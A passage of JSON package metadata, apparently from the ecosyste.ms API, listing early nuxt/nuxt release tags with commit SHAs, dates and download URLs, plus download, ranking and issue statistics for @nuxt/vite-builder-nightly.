ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:49.579Z","dependent_packages_count":0,"downloads":13511,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.22123301104748,"dependent_packages_count":52.61855168586287,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.91989234845518},"purl":"pkg:npm/%40nuxt/vite-builder-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/vite-builder-nightly","docker_dependents_count":1,"docker_downloads_count":15,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/vite-builder-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/vite-builder-nightly/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg